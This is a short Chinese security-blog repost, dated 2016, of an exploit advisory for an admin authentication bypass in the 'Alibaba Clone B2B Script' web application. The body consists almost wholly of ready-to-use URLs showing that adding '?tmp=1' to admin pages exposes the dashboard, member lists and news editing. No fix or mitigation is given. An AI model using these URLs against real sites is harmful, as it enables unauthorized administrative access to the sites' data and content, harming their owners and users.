Alibaba Clone B2B Script管理身份绕过漏洞

# Exploit Title: Alibaba Clone B2B Script Admin Authentication Bypass
# Vendor Homepage: [url]http://alibaba-clone.com/[/url]
# Version: All Versions
   
Exploit :
For enter , simply enter the following code
http://server/admin/adminhome.php?tmp=1
   
For each page is enough to add the following code to the end of url
example see page members :
http://server/admin/members.php?tmp=1
   
or add a new news :
http://server/admin/hot_news_menu.php?tmp=1
   
or edit news :
http://server/admin/edit_hot_news.php?hotnewsid=44&tmp=1

本文固定链接: https://www.unhonker.com/bug/1929.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2016年05月05日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Alibaba Clone B2B Script管理身份绕过漏洞 | 90' s Blog|关注网络信息安全

Alibaba Clone B2B Script管理身份绕过漏洞:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!